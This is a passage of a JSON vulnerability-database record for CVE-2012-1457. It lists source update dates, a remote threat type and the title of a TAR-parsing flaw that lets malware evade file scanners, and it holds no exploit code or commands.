"date": "2012-03-21T10:11:49.287000", "db": "NVD", "id": "CVE-2012-1457" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-18T00:00:00", "db": "VULHUB", "id": "VHN-54738" }, { "date": "2015-05-07T17:17:00", "db": "BID", "id": "52610" }, { "date": "2012-07-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001902" }, { "date": "2012-04-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201203-420" }, { "date": "2024-11-21T01:37:01.753000", "db": "NVD", "id": "CVE-2012-1457" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" }, { "db": "CNNVD", "id": "CNNVD-201203-420" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple products TAR Vulnerability that prevents file parsers from detecting malware", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001902" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "permissions and access control", "sources": [ { "db": "CNNVD", "id": "CNNVD-201203-420" } ], "trust": 0.6 } }